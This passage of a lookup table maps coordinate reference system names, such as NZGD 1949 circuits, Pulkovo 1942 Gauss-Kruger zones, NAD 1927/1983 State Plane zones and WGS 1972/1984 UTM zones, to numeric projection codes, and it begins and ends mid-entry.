'NZGD_1949_Jacksons_Bay_Circuit': 27223, 'NZGD_1949_Mount_Pleasant_Circuit': 27224, 'NZGD_1949_Gawler_Circuit': 27225, 'NZGD_1949_Timaru_Circuit': 27226, 'NZGD_1949_Lindis_Peak_Circuit': 27227, 'NZGD_1949_Mount_Nicholas_Circuit': 27228, 'NZGD_1949_Mount_York_Circuit': 27229, 'NZGD_1949_Observation_Point_Circuit': 27230, 'NZGD_1949_North_Taieri_Circuit': 27231, 'NZGD_1949_Bluff_Circuit': 27232, 'NZGD_1949_UTM_Zone_58S': 27258, 'NZGD_1949_UTM_Zone_59S': 27259, 'NZGD_1949_UTM_Zone_60S': 
27260, 'New_Zealand_North_Island': 27291, 'New_Zealand_South_Island': 27292, 'NGO_1948_Oslo_Norway_Zone_1': 27391, 'NGO_1948_Oslo_Norway_Zone_2': 27392, 'NGO_1948_Oslo_Norway_Zone_3': 27393, 'NGO_1948_Oslo_Norway_Zone_4': 27394, 'NGO_1948_Oslo_Norway_Zone_5': 27395, 'NGO_1948_Oslo_Norway_Zone_6': 27396, 'NGO_1948_Oslo_Norway_Zone_7': 27397, 'NGO_1948_Oslo_Norway_Zone_8': 27398, 'Datum_73_UTM_Zone_29N': 27429, 'Datum_73_Modified_Portuguese_Grid': 27492, 'Nord_de_Guerre': 27500, 'NTF_Paris_Lambert_Nord_France': 27561, 'NTF_Paris_Lambert_Centre_France': 27562, 'NTF_Paris_Lambert_Sud_France': 27563, 'NTF_Paris_Lambert_Corse': 27564, 'NTF_Paris_Lambert_Zone_I': 27571, 'NTF_Paris_Lambert_Zone_II': 27572, 'NTF_Paris_Lambert_Zone_III': 27573, 'NTF_Paris_Lambert_Zone_IV': 27574, 'NTF_Paris_France_I': 27581, 'NTF_Paris_France_II': 27582, 'NTF_Paris_France_III': 27583, 'NTF_Paris_France_IV': 27584, 'NTF_Paris_Nord_France': 27591, 'NTF_Paris_Centre_France': 27592, 'NTF_Paris_Sud_France': 27593, 'NTF_Paris_Corse': 27594, 'British_National_Grid': 27700, 'Palestine_1923_Palestine_Grid': 28191, 'Palestine_1923_Palestine_Belt': 28192, 'Palestine_1923_Israel_CS_Grid': 28193, 'Pointe_Noire_UTM_Zone_32S': 28232, 'GDA_1994_MGA_Zone_48': 28348, 'GDA_1994_MGA_Zone_49': 28349, 'GDA_1994_MGA_Zone_50': 28350, 'GDA_1994_MGA_Zone_51': 28351, 'GDA_1994_MGA_Zone_52': 28352, 'GDA_1994_MGA_Zone_53': 28353, 'GDA_1994_MGA_Zone_54': 28354, 'GDA_1994_MGA_Zone_55': 28355, 'GDA_1994_MGA_Zone_56': 28356, 'GDA_1994_MGA_Zone_57': 28357, 'GDA_1994_MGA_Zone_58': 28358, 'Pulkovo_1942_GK_Zone_2': 28402, 'Pulkovo_1942_GK_Zone_3': 28403, 'Pulkovo_1942_GK_Zone_4': 28404, 'Pulkovo_1942_GK_Zone_5': 28405, 'Pulkovo_1942_GK_Zone_6': 28406, 'Pulkovo_1942_GK_Zone_7': 28407, 'Pulkovo_1942_GK_Zone_8': 28408, 'Pulkovo_1942_GK_Zone_9': 28409, 'Pulkovo_1942_GK_Zone_10': 28410, 'Pulkovo_1942_GK_Zone_11': 28411, 'Pulkovo_1942_GK_Zone_12': 28412, 'Pulkovo_1942_GK_Zone_13': 28413, 'Pulkovo_1942_GK_Zone_14': 28414, 
'Pulkovo_1942_GK_Zone_15': 28415, 'Pulkovo_1942_GK_Zone_16': 28416, 'Pulkovo_1942_GK_Zone_17': 28417, 'Pulkovo_1942_GK_Zone_18': 28418, 'Pulkovo_1942_GK_Zone_19': 28419, 'Pulkovo_1942_GK_Zone_20': 28420, 'Pulkovo_1942_GK_Zone_21': 28421, 'Pulkovo_1942_GK_Zone_22': 28422, 'Pulkovo_1942_GK_Zone_23': 28423, 'Pulkovo_1942_GK_Zone_24': 28424, 'Pulkovo_1942_GK_Zone_25': 28425, 'Pulkovo_1942_GK_Zone_26': 28426, 'Pulkovo_1942_GK_Zone_27': 28427, 'Pulkovo_1942_GK_Zone_28': 28428, 'Pulkovo_1942_GK_Zone_29': 28429, 'Pulkovo_1942_GK_Zone_30': 28430, 'Pulkovo_1942_GK_Zone_31': 28431, 'Pulkovo_1942_GK_Zone_32': 28432, 'Pulkovo_1942_GK_Zone_2N': 28462, 'Pulkovo_1942_GK_Zone_3N': 28463, 'Pulkovo_1942_GK_Zone_4N': 28464, 'Pulkovo_1942_GK_Zone_5N': 28465, 'Pulkovo_1942_GK_Zone_6N': 28466, 'Pulkovo_1942_GK_Zone_7N': 28467, 'Pulkovo_1942_GK_Zone_8N': 28468, 'Pulkovo_1942_GK_Zone_9N': 28469, 'Pulkovo_1942_GK_Zone_10N': 28470, 'Pulkovo_1942_GK_Zone_11N': 28471, 'Pulkovo_1942_GK_Zone_12N': 28472, 'Pulkovo_1942_GK_Zone_13N': 28473, 'Pulkovo_1942_GK_Zone_14N': 28474, 'Pulkovo_1942_GK_Zone_15N': 28475, 'Pulkovo_1942_GK_Zone_16N': 28476, 'Pulkovo_1942_GK_Zone_17N': 28477, 'Pulkovo_1942_GK_Zone_18N': 28478, 'Pulkovo_1942_GK_Zone_19N': 28479, 'Pulkovo_1942_GK_Zone_20N': 28480, 'Pulkovo_1942_GK_Zone_21N': 28481, 'Pulkovo_1942_GK_Zone_22N': 28482, 'Pulkovo_1942_GK_Zone_23N': 28483, 'Pulkovo_1942_GK_Zone_24N': 28484, 'Pulkovo_1942_GK_Zone_25N': 28485, 'Pulkovo_1942_GK_Zone_26N': 28486, 'Pulkovo_1942_GK_Zone_27N': 28487, 'Pulkovo_1942_GK_Zone_28N': 28488, 'Pulkovo_1942_GK_Zone_29N': 28489, 'Pulkovo_1942_GK_Zone_30N': 28490, 'Pulkovo_1942_GK_Zone_31N': 28491, 'Pulkovo_1942_GK_Zone_32N': 28492, 'Qatar_National_Grid': 28600, 'RD_Old': 28991, 'RD_New': 28992, 'SAD_1969_Brazil_Polyconic': 29100, 'SAD_1969_Brazil_Polyconic': 29101, 'SAD_1969_UTM_Zone_18N': 29118, 'SAD_1969_UTM_Zone_19N': 29119, 'SAD_1969_UTM_Zone_20N': 29120, 'SAD_1969_UTM_Zone_21N': 29121, 'SAD_1969_UTM_Zone_22N': 29122, 
'SAD_1969_UTM_Zone_18N': 29168, 'SAD_1969_UTM_Zone_19N': 29169, 'SAD_1969_UTM_Zone_20N': 29170, 'SAD_1969_UTM_Zone_21N': 29171, 'SAD_1969_UTM_Zone_22N': 29172, 'SAD_1969_UTM_Zone_17S': 29177, 'SAD_1969_UTM_Zone_18S': 29178, 'SAD_1969_UTM_Zone_19S': 29179, 'SAD_1969_UTM_Zone_20S': 29180, 'SAD_1969_UTM_Zone_21S': 29181, 'SAD_1969_UTM_Zone_22S': 29182, 'SAD_1969_UTM_Zone_23S': 29183, 'SAD_1969_UTM_Zone_24S': 29184, 'SAD_1969_UTM_Zone_25S': 29185, 'SAD_1969_UTM_Zone_17S': 29187, 'SAD_1969_UTM_Zone_18S': 29188, 'SAD_1969_UTM_Zone_19S': 29189, 'SAD_1969_UTM_Zone_20S': 29190, 'SAD_1969_UTM_Zone_21S': 29191, 'SAD_1969_UTM_Zone_22S': 29192, 'SAD_1969_UTM_Zone_23S': 29193, 'SAD_1969_UTM_Zone_24S': 29194, 'SAD_1969_UTM_Zone_25S': 29195, 'Sapper_Hill_1943_UTM_Zone_20S': 29220, 'Sapper_Hill_1943_UTM_Zone_21S': 29221, 'Schwarzeck_UTM_Zone_33S': 29333, 'Sudan_UTM_Zone_35N': 29635, 'Sudan_UTM_Zone_36N': 29636, 'Tananarive_1925_UTM_Zone_38S': 29738, 'Tananarive_1925_UTM_Zone_39S': 29739, 'Timbalai_1948_UTM_Zone_49N': 29849, 'Timbalai_1948_UTM_Zone_50N': 29850, 'Timbalai_1948_RSO_Borneo_Chains': 29871, 'Timbalai_1948_RSO_Borneo_Feet': 29872, 'Timbalai_1948_RSO_Borneo_Meters': 29873, 'TM65_Irish_Grid': 29900, 'OSNI_1952_Irish_National_Grid': 29901, 'TM65_Irish_Grid': 29902, 'TM75_Irish_Grid': 29903, 'Japan_Zone_1': 30161, 'Japan_Zone_2': 30162, 'Japan_Zone_3': 30163, 'Japan_Zone_4': 30164, 'Japan_Zone_5': 30165, 'Japan_Zone_6': 30166, 'Japan_Zone_7': 30167, 'Japan_Zone_8': 30168, 'Japan_Zone_9': 30169, 'Japan_Zone_10': 30170, 'Japan_Zone_11': 30171, 'Japan_Zone_12': 30172, 'Japan_Zone_13': 30173, 'Japan_Zone_14': 30174, 'Japan_Zone_15': 30175, 'Japan_Zone_16': 30176, 'Japan_Zone_17': 30177, 'Japan_Zone_18': 30178, 'Japan_Zone_19': 30179, 'Trinidad_1903_Trinidad_Grid': 30200, 'TC_1948_UTM_Zone_39N': 30339, 'TC_1948_UTM_Zone_40N': 30340, 'Nord_Algerie_Ancienne': 30491, 'Sud_Algerie_Ancienne': 30492, 'Voirol_1879_Nord_Algerie_Ancienne': 30493, 'Voirol_1879_Sud_Algerie_Ancienne': 30494, 
'Nord_Algerie': 30591, 'Sud_Algerie': 30592, 'Nord_Sahara_1959_UTM_Zone_29N': 30729, 'Nord_Sahara_1959_UTM_Zone_30N': 30730, 'Nord_Sahara_1959_UTM_Zone_31N': 30731, 'Nord_Sahara_1959_UTM_Zone_32N': 30732, 'Nord_Sahara_1959_Voirol_Unifie_Nord': 30791, 'Nord_Sahara_1959_Voirol_Unifie_Sud': 30792, 'Swedish_National_Grid': 30800, 'Yoff_1972_UTM_Zone_28N': 31028, 'Zanderij_1972_UTM_Zone_21N': 31121, 'Zanderij_TM_54_NW': 31154, 'Zanderij_Suriname_Old_TM': 31170, 'Zanderij_Suriname_TM': 31171, 'MGI_Ferro_Austria_GK_West': 31251, 'MGI_Ferro_Austria_GK_Central': 31252, 'MGI_Ferro_Austria_GK_East': 31253, 'MGI_Austria_GK_West': 31254, 'MGI_Austria_GK_Central': 31255, 'MGI_Austria_GK_East': 31256, 'MGI_Austria_GK_M28': 31257, 'MGI_Austria_GK_M31': 31258, 'MGI_Austria_GK_M34': 31259, 'MGI_3_Degree_Gauss_Zone_5': 31265, 'MGI_3_Degree_Gauss_Zone_6': 31266, 'MGI_3_Degree_Gauss_Zone_7': 31267, 'MGI_3_Degree_Gauss_Zone_8': 31268, 'MGI_Balkans_5': 31275, 'MGI_Balkans_6': 31276, 'MGI_Balkans_7': 31277, 'MGI_Balkans_8': 31278, 'MGI_Balkans_8': 31279, 'Austria_West_Zone': 31281, 'Austria_Central_Zone': 31282, 'Austria_East_Zone': 31283, 'MGI_M28': 31284, 'MGI_M31': 31285, 'MGI_M34': 31286, 'MGI_Austria_Lambert': 31287, 'MGI_Ferro_M28': 31288, 'MGI_Ferro_M31': 31289, 'MGI_Ferro_M34': 31290, 'Austria_West_Zone': 31291, 'Austria_Central_Zone': 31292, 'Austria_East_Zone': 31293, 'MGI_M28': 31294, 'MGI_M31': 31295, 'MGI_M34': 31296, 'MGI_Austria_Lambert': 31297, 'Belge_Lambert_1972': 31370, 'DHDN_3_Degree_Gauss_Zone_1': 31461, 'DHDN_3_Degree_Gauss_Zone_2': 31462, 'DHDN_3_Degree_Gauss_Zone_3': 31463, 'DHDN_3_Degree_Gauss_Zone_4': 31464, 'DHDN_3_Degree_Gauss_Zone_5': 31465, 'DHDN_3_Degree_Gauss_Zone_2': 31466, 'DHDN_3_Degree_Gauss_Zone_3': 31467, 'DHDN_3_Degree_Gauss_Zone_4': 31468, 'DHDN_3_Degree_Gauss_Zone_5': 31469, 'Germany_Zone_1': 31491, 'Germany_Zone_2': 31492, 'Germany_Zone_3': 31493, 'Germany_Zone_4': 31494, 'Germany_Zone_5': 31495, 'Conakry_1905_UTM_Zone_28N': 31528, 
'Conakry_1905_UTM_Zone_29N': 31529, 'Stereo_33': 31600, 'Stereo_70': 31700, 'NGN_UTM_Zone_38N': 31838, 'NGN_UTM_Zone_39N': 31839, 'KUDAMS_KTM': 31901, 'SIRGAS_UTM_Zone_17N': 31917, 'SIRGAS_UTM_Zone_18N': 31918, 'SIRGAS_UTM_Zone_19N': 31919, 'SIRGAS_UTM_Zone_20N': 31920, 'SIRGAS_UTM_Zone_21N': 31921, 'SIRGAS_UTM_Zone_22N': 31922, 'SIRGAS_2000_UTM_Zone_17N': 31971, 'SIRGAS_2000_UTM_Zone_18N': 31972, 'SIRGAS_2000_UTM_Zone_19N': 31973, 'SIRGAS_2000_UTM_Zone_20N': 31974, 'SIRGAS_2000_UTM_Zone_21N': 31975, 'SIRGAS_2000_UTM_Zone_22N': 31976, 'SIRGAS_2000_UTM_Zone_17S': 31977, 'SIRGAS_2000_UTM_Zone_18S': 31978, 'SIRGAS_2000_UTM_Zone_19S': 31979, 'SIRGAS_2000_UTM_Zone_20S': 31980, 'SIRGAS_2000_UTM_Zone_21S': 31981, 'SIRGAS_2000_UTM_Zone_22S': 31982, 'SIRGAS_2000_UTM_Zone_23S': 31983, 'SIRGAS_2000_UTM_Zone_24S': 31984, 'SIRGAS_2000_UTM_Zone_25S': 31985, 'SIRGAS_UTM_Zone_17N': 31986, 'SIRGAS_UTM_Zone_18N': 31987, 'SIRGAS_UTM_Zone_19N': 31988, 'SIRGAS_UTM_Zone_20N': 31989, 'SIRGAS_UTM_Zone_21N': 31990, 'SIRGAS_UTM_Zone_22N': 31991, 'SIRGAS_UTM_Zone_17S': 31992, 'SIRGAS_UTM_Zone_18S': 31993, 'SIRGAS_UTM_Zone_19S': 31994, 'SIRGAS_UTM_Zone_20S': 31995, 'SIRGAS_UTM_Zone_21S': 31996, 'SIRGAS_UTM_Zone_22S': 31997, 'SIRGAS_UTM_Zone_23S': 31998, 'SIRGAS_UTM_Zone_24S': 31999, 'SIRGAS_UTM_Zone_25S': 32000, 'NAD_1927_StatePlane_Montana_North_FIPS_2501': 32001, 'NAD_1927_StatePlane_Montana_Central_FIPS_2502': 32002, 'NAD_1927_StatePlane_Montana_South_FIPS_2503': 32003, 'NAD_1927_StatePlane_Nebraska_North_FIPS_2601': 32005, 'NAD_1927_StatePlane_Nebraska_South_FIPS_2602': 32006, 'NAD_1927_StatePlane_Nevada_East_FIPS_2701': 32007, 'NAD_1927_StatePlane_Nevada_Central_FIPS_2702': 32008, 'NAD_1927_StatePlane_Nevada_West_FIPS_2703': 32009, 'NAD_1927_StatePlane_New_Hampshire_FIPS_2800': 32010, 'NAD_1927_StatePlane_New_Jersey_FIPS_2900': 32011, 'NAD_1927_StatePlane_New_Mexico_East_FIPS_3001': 32012, 'NAD_1927_StatePlane_New_Mexico_Central_FIPS_3002': 32013, 
'NAD_1927_StatePlane_New_Mexico_West_FIPS_3003': 32014, 'NAD_1927_StatePlane_New_York_East_FIPS_3101': 32015, 'NAD_1927_StatePlane_New_York_Central_FIPS_3102': 32016, 'NAD_1927_StatePlane_New_York_West_FIPS_3103': 32017, 'NAD_1927_StatePlane_New_York_Long_Island_FIPS_3104': 32018, 'NAD_1927_StatePlane_North_Carolina_FIPS_3200': 32019, 'NAD_1927_StatePlane_North_Dakota_North_FIPS_3301': 32020, 'NAD_1927_StatePlane_North_Dakota_South_FIPS_3302': 32021, 'NAD_1927_StatePlane_Ohio_North_FIPS_3401': 32022, 'NAD_1927_StatePlane_Ohio_South_FIPS_3402': 32023, 'NAD_1927_StatePlane_Oklahoma_North_FIPS_3501': 32024, 'NAD_1927_StatePlane_Oklahoma_South_FIPS_3502': 32025, 'NAD_1927_StatePlane_Oregon_North_FIPS_3601': 32026, 'NAD_1927_StatePlane_Oregon_South_FIPS_3602': 32027, 'NAD_1927_StatePlane_Pennsylvania_North_FIPS_3701': 32028, 'NAD_1927_StatePlane_Pennsylvania_South_FIPS_3702': 32029, 'NAD_1927_StatePlane_Rhode_Island_FIPS_3800': 32030, 'NAD_1927_StatePlane_South_Carolina_North_FIPS_3901': 32031, 'NAD_1927_StatePlane_South_Carolina_South_FIPS_3902': 32033, 'NAD_1927_StatePlane_South_Dakota_North_FIPS_4001': 32034, 'NAD_1927_StatePlane_South_Dakota_South_FIPS_4002': 32035, 'NAD_1927_StatePlane_Tennessee_FIPS_4100': 32036, 'NAD_1927_StatePlane_Texas_North_FIPS_4201': 32037, 'NAD_1927_StatePlane_Texas_North_Central_FIPS_4202': 32038, 'NAD_1927_StatePlane_Texas_Central_FIPS_4203': 32039, 'NAD_1927_StatePlane_Texas_South_Central_FIPS_4204': 32040, 'NAD_1927_StatePlane_Texas_South_FIPS_4205': 32041, 'NAD_1927_StatePlane_Utah_North_FIPS_4301': 32042, 'NAD_1927_StatePlane_Utah_Central_FIPS_4302': 32043, 'NAD_1927_StatePlane_Utah_South_FIPS_4303': 32044, 'NAD_1927_StatePlane_Vermont_FIPS_4400': 32045, 'NAD_1927_StatePlane_Virginia_North_FIPS_4501': 32046, 'NAD_1927_StatePlane_Virginia_South_FIPS_4502': 32047, 'NAD_1927_StatePlane_Washington_North_FIPS_4601': 32048, 'NAD_1927_StatePlane_Washington_South_FIPS_4602': 32049, 'NAD_1927_StatePlane_West_Virginia_North_FIPS_4701': 32050, 
'NAD_1927_StatePlane_West_Virginia_South_FIPS_4702': 32051, 'NAD_1927_StatePlane_Wisconsin_North_FIPS_4801': 32052, 'NAD_1927_StatePlane_Wisconsin_Central_FIPS_4802': 32053, 'NAD_1927_StatePlane_Wisconsin_South_FIPS_4803': 32054, 'NAD_1927_StatePlane_Wyoming_East_FIPS_4901': 32055, 'NAD_1927_StatePlane_Wyoming_East_Central_FIPS_4902': 32056, 'NAD_1927_StatePlane_Wyoming_West_Central_FIPS_4903': 32057, 'NAD_1927_StatePlane_Wyoming_West_FIPS_4904': 32058, 'NAD_1927_StatePlane_Puerto_Rico_FIPS_5201': 32059, 'NAD_1927_StatePlane_Virgin_Islands_St_Croix_FIPS_5202': 32060, 'NAD_1927_Guatemala_Norte': 32061, 'NAD_1927_Guatemala_Sur': 32062, 'NAD_1927_BLM_Zone_14N': 32064, 'NAD_1927_BLM_Zone_15N': 32065, 'NAD_1927_BLM_Zone_16N': 32066, 'NAD_1927_BLM_Zone_17N': 32067, 'NAD_1927_BLM_Zone_14N': 32074, 'NAD_1927_BLM_Zone_15N': 32075, 'NAD_1927_BLM_Zone_16N': 32076, 'NAD_1927_BLM_Zone_17N': 32077, 'NAD_1927_MTM_1': 32081, 'NAD_1927_MTM_2': 32082, 'NAD_1927_MTM_3': 32083, 'NAD_1927_MTM_4': 32084, 'NAD_1927_MTM_5': 32085, 'NAD_1927_MTM_6': 32086, 'NAD_1927_Quebec_Lambert': 32098, 'NAD_1927_StatePlane_Louisiana_Offshore_FIPS_1703': 32099, 'NAD_1983_StatePlane_Montana_FIPS_2500': 32100, 'NAD_1983_StatePlane_Nebraska_FIPS_2600': 32104, 'NAD_1983_StatePlane_Nevada_East_FIPS_2701': 32107, 'NAD_1983_StatePlane_Nevada_Central_FIPS_2702': 32108, 'NAD_1983_StatePlane_Nevada_West_FIPS_2703': 32109, 'NAD_1983_StatePlane_New_Hampshire_FIPS_2800': 32110, 'NAD_1983_StatePlane_New_Jersey_FIPS_2900': 32111, 'NAD_1983_StatePlane_New_Mexico_East_FIPS_3001': 32112, 'NAD_1983_StatePlane_New_Mexico_Central_FIPS_3002': 32113, 'NAD_1983_StatePlane_New_Mexico_West_FIPS_3003': 32114, 'NAD_1983_StatePlane_New_York_East_FIPS_3101': 32115, 'NAD_1983_StatePlane_New_York_Central_FIPS_3102': 32116, 'NAD_1983_StatePlane_New_York_West_FIPS_3103': 32117, 'NAD_1983_StatePlane_New_York_Long_Island_FIPS_3104': 32118, 'NAD_1983_StatePlane_North_Carolina_FIPS_3200': 32119, 
'NAD_1983_StatePlane_North_Dakota_North_FIPS_3301': 32120, 'NAD_1983_StatePlane_North_Dakota_South_FIPS_3302': 32121, 'NAD_1983_StatePlane_Ohio_North_FIPS_3401': 32122, 'NAD_1983_StatePlane_Ohio_South_FIPS_3402': 32123, 'NAD_1983_StatePlane_Oklahoma_North_FIPS_3501': 32124, 'NAD_1983_StatePlane_Oklahoma_South_FIPS_3502': 32125, 'NAD_1983_StatePlane_Oregon_North_FIPS_3601': 32126, 'NAD_1983_StatePlane_Oregon_South_FIPS_3602': 32127, 'NAD_1983_StatePlane_Pennsylvania_North_FIPS_3701': 32128, 'NAD_1983_StatePlane_Pennsylvania_South_FIPS_3702': 32129, 'NAD_1983_StatePlane_Rhode_Island_FIPS_3800': 32130, 'NAD_1983_StatePlane_South_Carolina_FIPS_3900': 32133, 'NAD_1983_StatePlane_South_Dakota_North_FIPS_4001': 32134, 'NAD_1983_StatePlane_South_Dakota_South_FIPS_4002': 32135, 'NAD_1983_StatePlane_Tennessee_FIPS_4100': 32136, 'NAD_1983_StatePlane_Texas_North_FIPS_4201': 32137, 'NAD_1983_StatePlane_Texas_North_Central_FIPS_4202': 32138, 'NAD_1983_StatePlane_Texas_Central_FIPS_4203': 32139, 'NAD_1983_StatePlane_Texas_South_Central_FIPS_4204': 32140, 'NAD_1983_StatePlane_Texas_South_FIPS_4205': 32141, 'NAD_1983_StatePlane_Utah_North_FIPS_4301': 32142, 'NAD_1983_StatePlane_Utah_Central_FIPS_4302': 32143, 'NAD_1983_StatePlane_Utah_South_FIPS_4303': 32144, 'NAD_1983_StatePlane_Vermont_FIPS_4400': 32145, 'NAD_1983_StatePlane_Virginia_North_FIPS_4501': 32146, 'NAD_1983_StatePlane_Virginia_South_FIPS_4502': 32147, 'NAD_1983_StatePlane_Washington_North_FIPS_4601': 32148, 'NAD_1983_StatePlane_Washington_South_FIPS_4602': 32149, 'NAD_1983_StatePlane_West_Virginia_North_FIPS_4701': 32150, 'NAD_1983_StatePlane_West_Virginia_South_FIPS_4702': 32151, 'NAD_1983_StatePlane_Wisconsin_North_FIPS_4801': 32152, 'NAD_1983_StatePlane_Wisconsin_Central_FIPS_4802': 32153, 'NAD_1983_StatePlane_Wisconsin_South_FIPS_4803': 32154, 'NAD_1983_StatePlane_Wyoming_East_FIPS_4901': 32155, 'NAD_1983_StatePlane_Wyoming_East_Central_FIPS_4902': 32156, 'NAD_1983_StatePlane_Wyoming_West_Central_FIPS_4903': 32157, 
'NAD_1983_StatePlane_Wyoming_West_FIPS_4904': 32158, 'NAD_1983_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 32161, 'NAD_1983_BLM_Zone_14N_ftUS': 32164, 'NAD_1983_BLM_Zone_15N_ftUS': 32165, 'NAD_1983_BLM_Zone_16N_ftUS': 32166, 'NAD_1983_BLM_Zone_17N_ftUS': 32167, 'NAD_1983_MTM_2_SCoPQ': 32180, 'NAD_1983_MTM_1': 32181, 'NAD_1983_MTM_2': 32182, 'NAD_1983_MTM_3': 32183, 'NAD_1983_MTM_4': 32184, 'NAD_1983_MTM_5': 32185, 'NAD_1983_MTM_6': 32186, 'NAD_1983_MTM_7': 32187, 'NAD_1983_MTM_8': 32188, 'NAD_1983_MTM_9': 32189, 'NAD_1983_MTM_10': 32190, 'NAD_1983_MTM_11': 32191, 'NAD_1983_MTM_12': 32192, 'NAD_1983_MTM_13': 32193, 'NAD_1983_MTM_14': 32194, 'NAD_1983_MTM_15': 32195, 'NAD_1983_MTM_16': 32196, 'NAD_1983_MTM_17': 32197, 'NAD_1983_Quebec_Lambert': 32198, 'NAD_1983_StatePlane_Louisiana_Offshore_FIPS_1703': 32199, 'WGS_1972_UTM_Zone_1N': 32201, 'WGS_1972_UTM_Zone_2N': 32202, 'WGS_1972_UTM_Zone_3N': 32203, 'WGS_1972_UTM_Zone_4N': 32204, 'WGS_1972_UTM_Zone_5N': 32205, 'WGS_1972_UTM_Zone_6N': 32206, 'WGS_1972_UTM_Zone_7N': 32207, 'WGS_1972_UTM_Zone_8N': 32208, 'WGS_1972_UTM_Zone_9N': 32209, 'WGS_1972_UTM_Zone_10N': 32210, 'WGS_1972_UTM_Zone_11N': 32211, 'WGS_1972_UTM_Zone_12N': 32212, 'WGS_1972_UTM_Zone_13N': 32213, 'WGS_1972_UTM_Zone_14N': 32214, 'WGS_1972_UTM_Zone_15N': 32215, 'WGS_1972_UTM_Zone_16N': 32216, 'WGS_1972_UTM_Zone_17N': 32217, 'WGS_1972_UTM_Zone_18N': 32218, 'WGS_1972_UTM_Zone_19N': 32219, 'WGS_1972_UTM_Zone_20N': 32220, 'WGS_1972_UTM_Zone_21N': 32221, 'WGS_1972_UTM_Zone_22N': 32222, 'WGS_1972_UTM_Zone_23N': 32223, 'WGS_1972_UTM_Zone_24N': 32224, 'WGS_1972_UTM_Zone_25N': 32225, 'WGS_1972_UTM_Zone_26N': 32226, 'WGS_1972_UTM_Zone_27N': 32227, 'WGS_1972_UTM_Zone_28N': 32228, 'WGS_1972_UTM_Zone_29N': 32229, 'WGS_1972_UTM_Zone_30N': 32230, 'WGS_1972_UTM_Zone_31N': 32231, 'WGS_1972_UTM_Zone_32N': 32232, 'WGS_1972_UTM_Zone_33N': 32233, 'WGS_1972_UTM_Zone_34N': 32234, 'WGS_1972_UTM_Zone_35N': 32235, 'WGS_1972_UTM_Zone_36N': 32236, 'WGS_1972_UTM_Zone_37N': 32237, 
'WGS_1972_UTM_Zone_38N': 32238, 'WGS_1972_UTM_Zone_39N': 32239, 'WGS_1972_UTM_Zone_40N': 32240, 'WGS_1972_UTM_Zone_41N': 32241, 'WGS_1972_UTM_Zone_42N': 32242, 'WGS_1972_UTM_Zone_43N': 32243, 'WGS_1972_UTM_Zone_44N': 32244, 'WGS_1972_UTM_Zone_45N': 32245, 'WGS_1972_UTM_Zone_46N': 32246, 'WGS_1972_UTM_Zone_47N': 32247, 'WGS_1972_UTM_Zone_48N': 32248, 'WGS_1972_UTM_Zone_49N': 32249, 'WGS_1972_UTM_Zone_50N': 32250, 'WGS_1972_UTM_Zone_51N': 32251, 'WGS_1972_UTM_Zone_52N': 32252, 'WGS_1972_UTM_Zone_53N': 32253, 'WGS_1972_UTM_Zone_54N': 32254, 'WGS_1972_UTM_Zone_55N': 32255, 'WGS_1972_UTM_Zone_56N': 32256, 'WGS_1972_UTM_Zone_57N': 32257, 'WGS_1972_UTM_Zone_58N': 32258, 'WGS_1972_UTM_Zone_59N': 32259, 'WGS_1972_UTM_Zone_60N': 32260, 'WGS_1972_UTM_Zone_1S': 32301, 'WGS_1972_UTM_Zone_2S': 32302, 'WGS_1972_UTM_Zone_3S': 32303, 'WGS_1972_UTM_Zone_4S': 32304, 'WGS_1972_UTM_Zone_5S': 32305, 'WGS_1972_UTM_Zone_6S': 32306, 'WGS_1972_UTM_Zone_7S': 32307, 'WGS_1972_UTM_Zone_8S': 32308, 'WGS_1972_UTM_Zone_9S': 32309, 'WGS_1972_UTM_Zone_10S': 32310, 'WGS_1972_UTM_Zone_11S': 32311, 'WGS_1972_UTM_Zone_12S': 32312, 'WGS_1972_UTM_Zone_13S': 32313, 'WGS_1972_UTM_Zone_14S': 32314, 'WGS_1972_UTM_Zone_15S': 32315, 'WGS_1972_UTM_Zone_16S': 32316, 'WGS_1972_UTM_Zone_17S': 32317, 'WGS_1972_UTM_Zone_18S': 32318, 'WGS_1972_UTM_Zone_19S': 32319, 'WGS_1972_UTM_Zone_20S': 32320, 'WGS_1972_UTM_Zone_21S': 32321, 'WGS_1972_UTM_Zone_22S': 32322, 'WGS_1972_UTM_Zone_23S': 32323, 'WGS_1972_UTM_Zone_24S': 32324, 'WGS_1972_UTM_Zone_25S': 32325, 'WGS_1972_UTM_Zone_26S': 32326, 'WGS_1972_UTM_Zone_27S': 32327, 'WGS_1972_UTM_Zone_28S': 32328, 'WGS_1972_UTM_Zone_29S': 32329, 'WGS_1972_UTM_Zone_30S': 32330, 'WGS_1972_UTM_Zone_31S': 32331, 'WGS_1972_UTM_Zone_32S': 32332, 'WGS_1972_UTM_Zone_33S': 32333, 'WGS_1972_UTM_Zone_34S': 32334, 'WGS_1972_UTM_Zone_35S': 32335, 'WGS_1972_UTM_Zone_36S': 32336, 'WGS_1972_UTM_Zone_37S': 32337, 'WGS_1972_UTM_Zone_38S': 32338, 'WGS_1972_UTM_Zone_39S': 32339, 'WGS_1972_UTM_Zone_40S': 
32340, 'WGS_1972_UTM_Zone_41S': 32341, 'WGS_1972_UTM_Zone_42S': 32342, 'WGS_1972_UTM_Zone_43S': 32343, 'WGS_1972_UTM_Zone_44S': 32344, 'WGS_1972_UTM_Zone_45S': 32345, 'WGS_1972_UTM_Zone_46S': 32346, 'WGS_1972_UTM_Zone_47S': 32347, 'WGS_1972_UTM_Zone_48S': 32348, 'WGS_1972_UTM_Zone_49S': 32349, 'WGS_1972_UTM_Zone_50S': 32350, 'WGS_1972_UTM_Zone_51S': 32351, 'WGS_1972_UTM_Zone_52S': 32352, 'WGS_1972_UTM_Zone_53S': 32353, 'WGS_1972_UTM_Zone_54S': 32354, 'WGS_1972_UTM_Zone_55S': 32355, 'WGS_1972_UTM_Zone_56S': 32356, 'WGS_1972_UTM_Zone_57S': 32357, 'WGS_1972_UTM_Zone_58S': 32358, 'WGS_1972_UTM_Zone_59S': 32359, 'WGS_1972_UTM_Zone_60S': 32360, 'WGS_1984_UTM_Zone_1N': 32601, 'WGS_1984_UTM_Zone_2N': 32602, 'WGS_1984_UTM_Zone_3N': 32603, 'WGS_1984_UTM_Zone_4N': 32604, 'WGS_1984_UTM_Zone_5N': 32605, 'WGS_1984_UTM_Zone_6N': 32606, 'WGS_1984_UTM_Zone_7N': 32607, 'WGS_1984_UTM_Zone_8N': 32608, 'WGS_1984_UTM_Zone_9N': 32609, 'WGS_1984_UTM_Zone_10N': 32610, 'WGS_1984_UTM_Zone_11N': 32611, 'WGS_1984_UTM_Zone_12N': 32612, 'WGS_1984_UTM_Zone_13N': 